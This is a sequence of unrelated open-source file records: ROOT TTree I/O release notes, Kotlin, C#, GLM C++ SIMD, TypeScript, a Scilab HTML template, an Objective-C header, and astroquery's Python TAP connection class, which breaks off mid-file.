   virtual void  AddBranchToCache(const char *bname, Bool_t subbranches = kFALSE);\n   virtual void  AddBranchToCache(TBranch *branch,   Bool_t subbranches = kFALSE);\n   virtual void  PrintCacheStats(Option_t* option = \"\") const;\n   virtual void  SetParallelUnzip(Bool_t opt=kTRUE);\n   virtual void  SetCacheEntryRange(Long64_t first, Long64_t last);\n   virtual void  SetCacheLearnEntries(Int_t n=10);\n   virtual void  StopCacheLearningPhase();
\n\n

New functionality AutoFlush (and changes to AutoSave)

\n\nImplement a new member fAutoFlush in TTree with its getter and setter:\n\n
void TTree::SetAutoFlush(Long64_t autof)
\n\nThe logic of the AutoFlush mechanism is optimized such that the TreeCache\nwill read always up to the point where FlushBaskets has been called.\nThis minimizes the number of cases where one has to seek backward when reading.\n
\nThis function may be called at the start of a program to change\nthe default value for fAutoFlush.\n\n
  • CASE 1 : autof > 0
    \n\n autof is the number of consecutive entries after which TTree::Fill will\n flush all branch buffers to disk.\n\n
  • CASE 2 : autof < 0
    \n\n When filling the Tree the branch buffers will be flushed to disk when\n more than autof bytes have been written to the file. At the first FlushBaskets\n TTree::Fill will replace fAutoFlush by the current value of fEntries.\n\n Calling this function with autof < 0 is interesting when it is hard to estimate\n the size of one entry. This value is also independent of the Tree.\n\n When calling SetAutoFlush with no arguments, the\n default value is -30000000, ie that the first AutoFlush will be done when\n 30 MBytes of data are written to the file.\n\n
  • CASE 3 : autof = 0
    \n The AutoFlush mechanism is disabled.\n\n
\n Flushing the buffers at regular intervals optimize the location of\n consecutive entries on the disk.\n\n
\nChanged the default value of AutoSave from 10 to 30 MBytes.\n
\n\n\n\n

New class TTreePerfStats

\nThis new class is an important tool to measure the I/O performance of a Tree.\nIt shows the locations in the file when reading a Tree. In particular it is easy\nto see the performance of the Tree Cache. The results can be:\n
    \n
  • drawn in a canvas.
  • \n
  • printed on standard output.
  • \n
  • saved to a file for processing later.
  • \n
\n
\n       Example of use\n {\n   TFile *f = TFile::Open(\"RelValMinBias-GEN-SIM-RECO.root\");\n   T = (TTree*)f->Get(\"Events\");\n   Long64_t nentries = T->GetEntries();\n   T->SetCacheSize(10000000);\n   T->AddBranchToCache(\"*\");\n\n   TTreePerfStats *ps= new TTreePerfStats(\"ioperf\",T);\n\n   for (Int_t i=0;i<nentries;i++) {\n      T->GetEntry(i);\n   }\n   ps->SaveAs(\"atlas_perf.root\");\n }\n
\n

then, in a root interactive session, one can do:

\n
\n    root > TFile f(\"atlas_perf.root\");\n    root > ioperf->Draw();\n    root > ioperf->Print();\n
\n\n

The Draw or Print functions print the following information:

\n
\n   TreeCache = TTree cache size in MBytes\n   N leaves  = Number of leaves in the TTree\n   ReadTotal = Total number of zipped bytes read\n   ReadUnZip = Total number of unzipped bytes read\n   ReadCalls = Total number of disk reads\n   ReadSize  = Average read size in KBytes\n   Readahead = Readahead size in KBytes\n   Readextra = Readahead overhead in percent\n   Real Time = Real Time in seconds\n   CPU  Time = CPU Time in seconds\n   Disk Time = Real Time spent in pure raw disk IO\n   Disk IO   = Raw disk IO speed in MBytes/second\n   ReadUZRT  = Unzipped MBytes per RT second\n   ReadUZCP  = Unipped MBytes per CP second\n   ReadRT    = Zipped MBytes per RT second\n   ReadCP    = Zipped MBytes per CP second\n
\n

\nThe Figure below shows the result for an original non optimized file when\nthe Tree Cache is not used.

\n

\"no

\n

The Figure below shows the result for the above data file written with the\nnew version of ROOT and when the Tree cache is activated.

\n

\"optimization,

\n\n\n\n\n"} {"text": "/*\n * Copyright 2017 Google LLC\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\npackage app.tivi.tmdb\n\nprivate val IMAGE_SIZE_PATTERN = \"w(\\\\d+)$\".toRegex()\n\ndata class TmdbImageUrlProvider(\n private val baseImageUrl: String = TmdbImageSizes.baseImageUrl,\n private val posterSizes: List = TmdbImageSizes.posterSizes,\n private val backdropSizes: List = TmdbImageSizes.backdropSizes,\n private val logoSizes: List = TmdbImageSizes.logoSizes\n) {\n fun getPosterUrl(path: String, imageWidth: Int): String {\n return \"$baseImageUrl${selectSize(posterSizes, imageWidth)}$path\"\n }\n\n fun getBackdropUrl(path: String, imageWidth: Int): String {\n return \"$baseImageUrl${selectSize(backdropSizes, imageWidth)}$path\"\n }\n\n fun getLogoUrl(path: String, imageWidth: Int): String {\n return \"$baseImageUrl${selectSize(logoSizes, imageWidth)}$path\"\n }\n\n private fun selectSize(sizes: List, imageWidth: Int): String {\n var previousSize: String? = null\n var previousWidth = 0\n\n for (i in sizes.indices) {\n val size = sizes[i]\n val sizeWidth = extractWidthAsIntFrom(size) ?: continue\n\n if (sizeWidth > imageWidth) {\n if (previousSize != null && imageWidth > (previousWidth + sizeWidth) / 2) {\n return size\n } else if (previousSize != null) {\n return previousSize\n }\n } else if (i == sizes.size - 1) {\n // If we get here then we're larger than the last bucket\n if (imageWidth < sizeWidth * 2) {\n return size\n }\n }\n\n previousSize = size\n previousWidth = sizeWidth\n }\n\n return previousSize ?: sizes.last()\n }\n\n private fun extractWidthAsIntFrom(size: String): Int? {\n return IMAGE_SIZE_PATTERN.matchEntire(size)?.groups?.get(1)?.value?.toInt()\n }\n}\n"} {"text": "// -------------------------------------------------------------------------------------------\n// \n// MapWindow OSS Team - 2015\n// \n// -------------------------------------------------------------------------------------------\n\nusing System.Collections;\nusing System.Collections.Generic;\nusing MW5.Plugins.Printing.Model.Elements;\n\nnamespace MW5.Plugins.Printing.Model\n{\n internal class LayoutElementCollection : IEnumerable\n {\n private readonly List _elements;\n\n public LayoutElementCollection()\n {\n _elements = new List();\n }\n\n /// \n /// Returns an enumerator that iterates through the collection.\n /// \n public IEnumerator GetEnumerator()\n {\n return _elements.GetEnumerator();\n }\n\n /// \n /// Returns an enumerator that iterates through a collection.\n /// \n IEnumerator IEnumerable.GetEnumerator()\n {\n return GetEnumerator();\n }\n }\n}"} {"text": "/// @ref core\n/// @file glm/detail/func_common_simd.inl\n\n#if GLM_ARCH & GLM_ARCH_SSE2_BIT\n\n#include \"../simd/common.h\"\n\n#include \n\nnamespace glm{\nnamespace detail\n{\n\ttemplate\n\tstruct compute_abs_vector<4, float, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, float, Q> call(vec<4, float, Q> const& v)\n\t\t{\n\t\t\tvec<4, float, Q> result;\n\t\t\tresult.data = glm_vec4_abs(v.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_abs_vector<4, int, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, int, Q> call(vec<4, int, Q> const& v)\n\t\t{\n\t\t\tvec<4, int, Q> result;\n\t\t\tresult.data = glm_ivec4_abs(v.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_floor<4, float, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, float, Q> call(vec<4, float, Q> const& v)\n\t\t{\n\t\t\tvec<4, float, Q> result;\n\t\t\tresult.data = glm_vec4_floor(v.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_ceil<4, float, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, float, Q> call(vec<4, float, Q> const& v)\n\t\t{\n\t\t\tvec<4, float, Q> result;\n\t\t\tresult.data = glm_vec4_ceil(v.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_fract<4, float, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, float, Q> call(vec<4, float, Q> const& v)\n\t\t{\n\t\t\tvec<4, float, Q> result;\n\t\t\tresult.data = glm_vec4_fract(v.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_round<4, float, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, float, Q> call(vec<4, float, Q> const& v)\n\t\t{\n\t\t\tvec<4, float, Q> result;\n\t\t\tresult.data = glm_vec4_round(v.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_mod<4, float, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, float, Q> call(vec<4, float, Q> const& x, vec<4, float, Q> const& y)\n\t\t{\n\t\t\tvec<4, float, Q> result;\n\t\t\tresult.data = glm_vec4_mod(x.data, y.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_min_vector<4, float, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, float, Q> call(vec<4, float, Q> const& v1, vec<4, float, Q> const& v2)\n\t\t{\n\t\t\tvec<4, float, Q> result;\n\t\t\tresult.data = _mm_min_ps(v1.data, v2.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_min_vector<4, int, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, int, Q> call(vec<4, int, Q> const& v1, vec<4, int, Q> const& v2)\n\t\t{\n\t\t\tvec<4, int, Q> result;\n\t\t\tresult.data = _mm_min_epi32(v1.data, v2.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_min_vector<4, uint, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, uint, Q> call(vec<4, uint, Q> const& v1, vec<4, uint, Q> const& v2)\n\t\t{\n\t\t\tvec<4, uint, Q> result;\n\t\t\tresult.data = _mm_min_epu32(v1.data, v2.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_max_vector<4, float, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, float, Q> call(vec<4, float, Q> const& v1, vec<4, float, Q> const& v2)\n\t\t{\n\t\t\tvec<4, float, Q> result;\n\t\t\tresult.data = _mm_max_ps(v1.data, v2.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_max_vector<4, int, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, int, Q> call(vec<4, int, Q> const& v1, vec<4, int, Q> const& v2)\n\t\t{\n\t\t\tvec<4, int, Q> result;\n\t\t\tresult.data = _mm_max_epi32(v1.data, v2.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_max_vector<4, uint, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, uint, Q> call(vec<4, uint, Q> const& v1, vec<4, uint, Q> const& v2)\n\t\t{\n\t\t\tvec<4, uint, Q> result;\n\t\t\tresult.data = _mm_max_epu32(v1.data, v2.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_clamp_vector<4, float, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, float, Q> call(vec<4, float, Q> const& x, vec<4, float, Q> const& minVal, vec<4, float, Q> const& maxVal)\n\t\t{\n\t\t\tvec<4, float, Q> result;\n\t\t\tresult.data = _mm_min_ps(_mm_max_ps(x.data, minVal.data), maxVal.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_clamp_vector<4, int, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, int, Q> call(vec<4, int, Q> const& x, vec<4, int, Q> const& minVal, vec<4, int, Q> const& maxVal)\n\t\t{\n\t\t\tvec<4, int, Q> result;\n\t\t\tresult.data = _mm_min_epi32(_mm_max_epi32(x.data, minVal.data), maxVal.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_clamp_vector<4, uint, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, uint, Q> call(vec<4, uint, Q> const& x, vec<4, uint, Q> const& minVal, vec<4, uint, Q> const& maxVal)\n\t\t{\n\t\t\tvec<4, uint, Q> result;\n\t\t\tresult.data = _mm_min_epu32(_mm_max_epu32(x.data, minVal.data), maxVal.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_mix_vector<4, float, bool, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, float, Q> call(vec<4, float, Q> const& x, vec<4, float, Q> const& y, vec<4, bool, Q> const& a)\n\t\t{\n\t\t\t__m128i const Load = _mm_set_epi32(-static_cast(a.w), -static_cast(a.z), -static_cast(a.y), -static_cast(a.x));\n\t\t\t__m128 const Mask = _mm_castsi128_ps(Load);\n\n\t\t\tvec<4, float, Q> Result;\n#\t\t\tif 0 && GLM_ARCH & GLM_ARCH_AVX\n\t\t\t\tResult.data = _mm_blendv_ps(x.data, y.data, Mask);\n#\t\t\telse\n\t\t\t\tResult.data = _mm_or_ps(_mm_and_ps(Mask, y.data), _mm_andnot_ps(Mask, x.data));\n#\t\t\tendif\n\t\t\treturn Result;\n\t\t}\n\t};\n/* FIXME\n\ttemplate\n\tstruct compute_step_vector\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, float, Q> call(vec<4, float, Q> const& edge, vec<4, float, Q> const& x)\n\t\t{\n\t\t\tvec<4, float, Q> Result;\n\t\t\tresult.data = glm_vec4_step(edge.data, x.data);\n\t\t\treturn result;\n\t\t}\n\t};\n*/\n\ttemplate\n\tstruct compute_smoothstep_vector<4, float, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, float, Q> call(vec<4, float, Q> const& edge0, vec<4, float, Q> const& edge1, vec<4, float, Q> const& x)\n\t\t{\n\t\t\tvec<4, float, Q> Result;\n\t\t\tResult.data = glm_vec4_smoothstep(edge0.data, edge1.data, x.data);\n\t\t\treturn Result;\n\t\t}\n\t};\n}//namespace detail\n}//namespace glm\n\n#endif//GLM_ARCH & GLM_ARCH_SSE2_BIT\n"} {"text": "
\n"} {"text": "module Side {\n 'use strict';\n\n import Paths = Constants.Paths;\n let Page = Paths.Side;\n\n angular.module(Page.Base, [])\n .config(statesConfiguration);\n\n function statesConfiguration(\n $stateProvider: ng.ui.IStateProvider\n ): void {\n\n $stateProvider\n .state(Paths.Tabs + '.' + Page.Left, {\n url: '/' + Page.Left,\n views: {\n 'left-tab': {\n templateUrl: Paths.Modules + 'side/views/left.html'\n }\n }\n }\n );\n }\n}\n"} {"text": "\n\n\n\n \n \n\n \n \n\n"} {"text": "\n\n \n <!--<title>--> <!--<subtitle>-->\n \n \n \n \n \n \n
\n
\n\t\n
\n
\n\n\t
\n\t \n\t \n\t \n\t \n\t \n\t \n\t
\n\t
\n\n\t\n\n\t
\n\t \n\t \n\t \n\t \n\t \n\t \n\t
\n\t
\n\n\t
\n\t \n\t
\n\n\t
\n\t
\n\t Scilab Enterprises
\n\t Copyright (c) 2011-2014 (Scilab Enterprises)
\n\t Copyright (c) 1989-2012 (INRIA)
\n\t Copyright (c) 1989-2007 (ENPC)
\n\t with contributors\n\t
\n\n\t
\n\t Last updated:
\n\t


\n\t
\n\t
\n
\n
\n \n\n"} {"text": "//\n// Generated by class-dump 3.5 (64 bit) (Debug version compiled Oct 15 2018 10:31:50).\n//\n// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2015 by Steve Nygard.\n//\n\n#import \n\n@class NSNumber, NSString;\n\n@interface CEMSystemNotificationsDeclaration_NotificationSettingsItem : CEMPayloadBase\n{\n NSString *_payloadBundleIdentifier;\n NSNumber *_payloadNotificationsEnabled;\n NSNumber *_payloadShowInNotificationCenter;\n NSNumber *_payloadShowInLockScreen;\n NSNumber *_payloadAlertType;\n NSNumber *_payloadBadgesEnabled;\n NSNumber *_payloadSoundsEnabled;\n NSNumber *_payloadShowInCarPlay;\n NSNumber *_payloadEmergencyEnabled;\n NSNumber *_payloadCriticalAlertEnabled;\n NSNumber *_payloadGroupingType;\n}\n\n+ (id)buildRequiredOnlyWithBundleIdentifier:(id)arg1;\n+ (id)buildWithBundleIdentifier:(id)arg1 withNotificationsEnabled:(id)arg2 withShowInNotificationCenter:(id)arg3 withShowInLockScreen:(id)arg4 withAlertType:(id)arg5 withBadgesEnabled:(id)arg6 withSoundsEnabled:(id)arg7 withShowInCarPlay:(id)arg8 withEmergencyEnabled:(id)arg9 withCriticalAlertEnabled:(id)arg10 withGroupingType:(id)arg11;\n+ (id)allowedPayloadKeys;\n- (void).cxx_destruct;\n@property(copy, nonatomic) NSNumber *payloadGroupingType; // @synthesize payloadGroupingType=_payloadGroupingType;\n@property(copy, nonatomic) NSNumber *payloadCriticalAlertEnabled; // @synthesize payloadCriticalAlertEnabled=_payloadCriticalAlertEnabled;\n@property(copy, nonatomic) NSNumber *payloadEmergencyEnabled; // @synthesize payloadEmergencyEnabled=_payloadEmergencyEnabled;\n@property(copy, nonatomic) NSNumber *payloadShowInCarPlay; // @synthesize payloadShowInCarPlay=_payloadShowInCarPlay;\n@property(copy, nonatomic) NSNumber *payloadSoundsEnabled; // @synthesize payloadSoundsEnabled=_payloadSoundsEnabled;\n@property(copy, nonatomic) NSNumber *payloadBadgesEnabled; // @synthesize payloadBadgesEnabled=_payloadBadgesEnabled;\n@property(copy, nonatomic) NSNumber *payloadAlertType; // @synthesize payloadAlertType=_payloadAlertType;\n@property(copy, nonatomic) NSNumber *payloadShowInLockScreen; // @synthesize payloadShowInLockScreen=_payloadShowInLockScreen;\n@property(copy, nonatomic) NSNumber *payloadShowInNotificationCenter; // @synthesize payloadShowInNotificationCenter=_payloadShowInNotificationCenter;\n@property(copy, nonatomic) NSNumber *payloadNotificationsEnabled; // @synthesize payloadNotificationsEnabled=_payloadNotificationsEnabled;\n@property(copy, nonatomic) NSString *payloadBundleIdentifier; // @synthesize payloadBundleIdentifier=_payloadBundleIdentifier;\n- (id)copyWithZone:(struct _NSZone *)arg1;\n- (id)serializePayloadWithAssetProviders:(id)arg1;\n- (BOOL)loadPayload:(id)arg1 error:(id *)arg2;\n\n@end\n\n"} {"text": "# Licensed under a 3-clause BSD style license - see LICENSE.rst\r\n\"\"\"\r\n=============\r\nTAP plus\r\n=============\r\n\r\n@author: Juan Carlos Segovia\r\n@contact: juan.carlos.segovia@sciops.esa.int\r\n\r\nEuropean Space Astronomy Centre (ESAC)\r\nEuropean Space Agency (ESA)\r\n\r\nCreated on 30 jun. 2016\r\n\r\n\r\n\"\"\"\r\n\r\ntry:\r\n # python 3\r\n import http.client as httplib\r\nexcept ImportError:\r\n # python 2\r\n import httplib\r\nimport mimetypes\r\nimport time\r\n\r\nfrom six.moves.urllib.parse import urlencode\r\n\r\nfrom astroquery.utils.tap.xmlparser import utils\r\nfrom astroquery.utils.tap import taputils\r\n\r\nimport requests\r\n\r\n__all__ = ['TapConn']\r\n\r\nCONTENT_TYPE_POST_DEFAULT = \"application/x-www-form-urlencoded\"\r\n\r\n\r\nclass TapConn(object):\r\n \"\"\"TAP plus connection class\r\n Provides low level HTTP connection capabilities\r\n \"\"\"\r\n\r\n def __init__(self, ishttps,\r\n host,\r\n server_context=None,\r\n port=80,\r\n sslport=443,\r\n connhandler=None,\r\n tap_context=None,\r\n upload_context=None,\r\n table_edit_context=None,\r\n data_context=None,\r\n datalink_context=None):\r\n\r\n \"\"\"Constructor\r\n\r\n Parameters\r\n ----------\r\n ishttps: bool, mandatory\r\n 'True' is the protocol to use is HTTPS\r\n host : str, mandatory\r\n host name\r\n server_context : str, mandatory\r\n server context\r\n tap_context : str, optional\r\n tap context\r\n upload_context : str, optional\r\n upload context\r\n table_edit_context : str, optional\r\n table edit context\r\n data_context : str, optional\r\n data context\r\n datalink_context : str, optional\r\n datalink context\r\n port : int, optional, default 80\r\n HTTP port\r\n sslport : int, optional, default 443\r\n HTTPS port\r\n connhandler connection handler object, optional, default None\r\n HTTP(s) connection hander (creator). If no handler is provided, a\r\n new one is created.\r\n \"\"\"\r\n self.__interna_init()\r\n self.__isHttps = ishttps\r\n self.__connHost = host\r\n self.__connPort = port\r\n self.__connPortSsl = sslport\r\n if server_context is not None:\r\n if(server_context.startswith(\"/\")):\r\n self.__serverContext = server_context\r\n else:\r\n self.__serverContext = \"/\" + server_context\r\n else:\r\n self.__serverContext = \"\"\r\n self.__tapContext = self.__create_context(tap_context)\r\n self.__dataContext = self.__create_context(data_context)\r\n self.__datalinkContext = self.__create_context(datalink_context)\r\n self.__uploadContext = self.__create_context(upload_context)\r\n self.__tableEditContext = self.__create_context(table_edit_context)\r\n if connhandler is None:\r\n self.__connectionHandler = ConnectionHandler(self.__connHost,\r\n self.__connPort,\r\n self.__connPortSsl)\r\n else:\r\n self.__connectionHandler = connhandler\r\n\r\n def __create_context(self, context):\r\n if (context is not None and context != \"\"):\r\n if(str(context).startswith(\"/\")):\r\n return self.__serverContext + str(context)\r\n else:\r\n return self.__serverContext + \"/\" + str(context)\r\n else:\r\n return self.__serverContext\r\n\r\n def __interna_init(self):\r\n self.__connectionHandler = None\r\n self.__isHttps = False\r\n self.__connHost = \"\"\r\n self.__connPort = 80\r\n self.__connPortSsl = 443\r\n self.__serverContext = None\r\n self.__tapContext = None\r\n self.__postHeaders = {\r\n \"Content-type\": CONTENT_TYPE_POST_DEFAULT,\r\n \"Accept\": \"text/plain\"\r\n }\r\n self.__getHeaders = {}\r\n self.__cookie = None\r\n self.__currentStatus = 0\r\n self.__currentReason = \"\"\r\n\r\n def __get_tap_context(self, subContext):\r\n return self.__tapContext + \"/\" + subContext\r\n\r\n def __get_data_context(self, encodedData=None):\r\n if self.__dataContext is None:\r\n raise ValueError(\"data_context must be specified at TAP object \" +\r\n \"creation for this action to be performed\")\r\n if encodedData is not None:\r\n return self.__dataContext + \"?\" + str(encodedData)\r\n else:\r\n return self.__dataContext\r\n\r\n def __get_datalink_context(self, subContext, encodedData=None):\r\n if self.__datalinkContext is None:\r\n raise ValueError(\"datalink_context must be specified at TAP \" +\r\n \"object creation for this action to be \" +\r\n \"performed\")\r\n if encodedData is not None:\r\n return self.__datalinkContext + \"/\" + subContext + \"?\" +\\\r\n encodedData\r\n else:\r\n return self.__datalinkContext + \"/\" + subContext\r\n\r\n def __get_upload_context(self):\r\n if self.__uploadContext is None:\r\n raise ValueError(\"upload_context must be specified at TAP \" +\r\n \"object creation for this action to be \" +\r\n \"performed\")\r\n return self.__uploadContext\r\n\r\n def __get_table_edit_context(self):\r\n if self.__tableEditContext is None:\r\n raise ValueError(\"table_edit_context must be specified at TAP \" +\r\n \"object creation for this action to be \" +\r\n \"performed\")\r\n return self.__tableEditContext\r\n\r\n def __get_server_context(self, subContext):\r\n return self.__serverContext + \"/\" + subContext\r\n\r\n def execute_tapget(self, subcontext, verbose=False):\r\n \"\"\"Executes a TAP GET request\r\n The connection is done through HTTP or HTTPS depending on the login\r\n status (logged in -> HTTPS)\r\n\r\n Parameters\r\n ----------\r\n subcontext : str, mandatory\r\n context to be added to host+serverContext+tapContext, usually the\r\n TAP list name\r\n verbose : bool, optional, default 'False'\r\n flag to display information about the process\r\n\r\n Returns\r\n -------\r\n An HTTP(s) response object\r\n \"\"\"\r\n if subcontext.startswith(\"http\"):\r\n # absolute url\r\n return self.__execute_get(subcontext, verbose)\r\n else:\r\n context = self.__get_tap_context(subcontext)\r\n return self.__execute_get(context, verbose)\r\n\r\n def execute_dataget(self, query, verbose=False):\r\n \"\"\"Executes a data GET request\r\n The connection is done through HTTP or HTTPS depending on the login\r\n status (logged in -> HTTPS)\r\n\r\n Parameters\r\n ----------\r\n query : str, mandatory\r\n URL encoded data (query string)\r\n verbose : bool, optional, default 'False'\r\n flag to display information about the process\r\n\r\n Returns\r\n -------\r\n An HTTP(s) response object\r\n \"\"\"\r\n context = self.__get_data_context(query)\r\n return self.__execute_get(context, verbose)\r\n\r\n def execute_datalinkget(self, subcontext, query, verbose=False):\r\n \"\"\"Executes a datalink GET request\r\n The connection is done through HTTP or HTTPS depending on the login\r\n status (logged in -> HTTPS)\r\n\r\n Parameters\r\n ----------\r\n subcontext : str, mandatory\r\n datalink subcontext\r\n query : str, mandatory\r\n URL encoded data (query string)\r\n verbose : bool, optional, default 'False'\r\n flag to display information about the process\r\n\r\n Returns\r\n -------\r\n An HTTP(s) response object\r\n \"\"\"\r\n context = self.__get_datalink_context(subcontext, query)\r\n return self.__execute_get(context, verbose)\r\n\r\n def __execute_get(self, context, verbose=False):\r\n conn = self.__get_connection(verbose)\r\n if verbose:\r\n print(\"host = \" + str(conn.host) + \":\" + str(conn.port))\r\n print(\"context = \" + context)\r\n conn.request(\"GET\", context, None, self.__getHeaders)\r\n response = conn.getresponse()\r\n self.__currentReason = response.reason\r\n self.__currentStatus = response.status\r\n return response\r\n\r\n def execute_tappost(self, subcontext, data,\r\n content_type=CONTENT_TYPE_POST_DEFAULT,\r\n verbose=False):\r\n \"\"\"Executes a POST request\r\n The connection is done through HTTP or HTTPS depending on the login\r\n status (logged in -> HTTPS)\r\n\r\n Parameters\r\n ----------\r\n subcontext : str, mandatory\r\n context to be added to host+serverContext+tapContext, usually the\r\n TAP list name\r\n data : str, mandatory\r\n POST data\r\n content_type: str, optional, default: application/x-www-form-urlencoded\r\n HTTP(s) content-type header value\r\n verbose : bool, optional, default 'False'\r\n flag to display information about the process\r\n\r\n Returns\r\n -------\r\n An HTTP(s) response object\r\n \"\"\"\r\n context = self.__get_tap_context(subcontext)\r\n return self.__execute_post(context, data, content_type, verbose)\r\n\r\n def execute_datapost(self, data,\r\n content_type=CONTENT_TYPE_POST_DEFAULT,\r\n verbose=False):\r\n \"\"\"Executes a POST request\r\n The connection is done through HTTP or HTTPS depending on the login\r\n status (logged in -> HTTPS)\r\n\r\n Parameters\r\n ----------\r\n data : str, mandatory\r\n POST data\r\n content_type: str, optional, default: application/x-www-form-urlencoded\r\n HTTP(s) content-type header value\r\n verbose : bool, optional, default 'False'\r\n flag to display information about the process\r\n\r\n Returns\r\n -------\r\n An HTTP(s) response object\r\n \"\"\"\r\n context = self.__get_data_context()\r\n return self.__execute_post(context, data, content_type, verbose)\r\n\r\n def execute_datalinkpost(self, subcontext, data,\r\n content_type=CONTENT_TYPE_POST_DEFAULT,\r\n verbose=False):\r\n \"\"\"Executes a POST request\r\n The connection is done through HTTP or HTTPS depending on the login\r\n status (logged in -> HTTPS)\r\n\r\n Parameters\r\n ----------\r\n subcontext : str, mandatory\r\n datalink subcontext (e.g. 'capabilities', 'availability',\r\n 'links', etc.)\r\n data : str, mandatory\r\n POST data\r\n content_type: str, optional, default: application/x-www-form-urlencoded\r\n HTTP(s) content-type header value\r\n verbose : bool, optional, default 'False'\r\n flag to display information about the process\r\n\r\n Returns\r\n -------\r\n An HTTP(s) response object\r\n \"\"\"\r\n context = self.__get_datalink_context(subcontext)\r\n return self.__execute_post(context, data, content_type, verbose)\r\n\r\n def execute_upload(self, data,\r\n content_type=CONTENT_TYPE_POST_DEFAULT,\r\n verbose=False):\r\n \"\"\"Executes a POST upload request\r\n The connection is done through HTTP or HTTPS depending on the login\r\n status (logged in -> HTTPS)\r\n\r\n Parameters\r\n ----------\r\n data : str, mandatory\r\n POST data\r\n content_type: str, optional, default: application/x-www-form-urlencoded\r\n HTTP(s) content-type header value\r\n verbose : bool, optional, default 'False'\r\n flag to display information about the process\r\n\r\n Returns\r\n -------\r\n An HTTP(s) response object\r\n \"\"\"\r\n context = self.__get_upload_context()\r\n return self.__execute_post(context, data, content_type, verbose)\r\n\r\n def execute_share(self, data, verbose=False):\r\n \"\"\"Executes a POST upload request\r\n The connection is done through HTTP or HTTPS depending on the login\r\n status (logged in -> HTTPS)\r\n\r\n Parameters\r\n ----------\r\n data : str, mandatory\r\n POST data\r\n content_type: str, optional, default: application/x-www-form-urlencoded\r\n HTTP(s) content-type header value\r\n verbose : bool, optional, default 'False'\r\n flag to display information about the process\r\n\r\n Returns\r\n -------\r\n An HTTP(s) response object\r\n \"\"\"\r\n context = self.__get_tap_context(\"share\")\r\n return self.__execute_post(context,\r\n data,\r\n content_type=CONTENT_TYPE_POST_DEFAULT,\r\n verbose=verbose)\r\n\r\n def execute_table_edit(self, data,\r\n content_type=CONTENT_TYPE_POST_DEFAULT,\r\n verbose=False):\r\n \"\"\"Executes a POST upload request\r\n The connection is done through HTTP or HTTPS depending on the login\r\n status (logged in -> HTTPS)\r\n\r\n Parameters\r\n ----------\r\n data : str, mandatory\r\n POST data\r\n content_type: str, optional, default: application/x-www-form-urlencoded\r\n HTTP(s) content-type header value\r\n verbose : bool, optional, default 'False'\r\n flag to display information about the process\r\n\r\n Returns\r\n -------\r\n An HTTP(s) response object\r\n \"\"\"\r\n context = self.__get_table_edit_context()\r\n return self.__execute_post(context, data, content_type, verbose)\r\n\r\n def __execute_post(self, context, data,\r\n content_type=CONTENT_TYPE_POST_DEFAULT,\r\n verbose=False):\r\n conn = self.__get_connection(verbose)\r\n if verbose:\r\n print(\"host = \" + str(conn.host) + \":\" + str(conn.port))\r\n print(\"context = \" + context)\r\n print(\"Content-type = \" + str(content_type))\r\n self.__postHeaders[\"Content-type\"] = content_type\r\n conn.request(\"POST\", context, data, self.__postHeaders)\r\n response = conn.getresponse()\r\n self.__currentReason = response.reason\r\n self.__currentStatus = response.status\r\n return response\r\n\r\n def execute_secure(self, subcontext, data, verbose=False):\r\n \"\"\"Executes a secure POST request\r\n The connection is done through HTTPS\r\n\r\n Parameters\r\n ----------\r\n subcontext : str, mandatory\r\n context to be added to host+serverContext+tapContext\r\n data : str, mandatory\r\n POST data\r\n verbose : bool, optional, default 'False'\r\n flag to display information about the process\r\n\r\n Returns\r\n -------\r\n An 